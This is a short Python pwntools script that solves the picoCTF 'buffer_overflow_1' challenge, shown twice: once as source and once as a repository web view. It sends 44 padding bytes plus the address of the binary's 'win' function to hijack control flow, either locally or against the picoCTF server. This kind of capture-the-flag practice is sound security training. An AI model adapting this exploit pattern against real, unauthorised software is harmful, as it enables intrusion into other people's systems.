picoctf/pwn/buffer_overflow_1/solve.py

#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.pwntools

from pwn import *

exe = ELF("./vuln")

context.binary = exe

ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()

def conn():
    if args.REMOTE:
        r = remote(ADDR, PORT)
    else:
        r = process([exe.path])

    return r

def main():
  r = conn()

  r.recvuntil(b"Please enter your string:")
  offset = 44 # found with pwndbg
  payload = b'A' * offset + p32(exe.sym.win)
  r.sendline(payload)
  print(r.recvall())
  r.close()

if __name__ == "__main__":
    main()
pwn/buffer_overflow_1 2024-09-03 19:33:13 +02:00			`#!/usr/bin/env nix-shell`
			`#!nix-shell -p python3 -i python3 python3Packages.pwntools`

			`from pwn import *`

			`exe = ELF("./vuln")`

			`context.binary = exe`

			`ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()`

			`def conn():`
			`if args.REMOTE:`
			`r = remote(ADDR, PORT)`
			`else:`
			`r = process([exe.path])`

			`return r`

			`def main():`
			`r = conn()`

			`r.recvuntil(b"Please enter your string:")`
			`offset = 44 # found with pwndbg`
			`payload = b'A' * offset + p32(exe.sym.win)`
			`r.sendline(payload)`
			`print(r.recvall())`
			`r.close()`

			`if __name__ == "__main__":`
			`main()`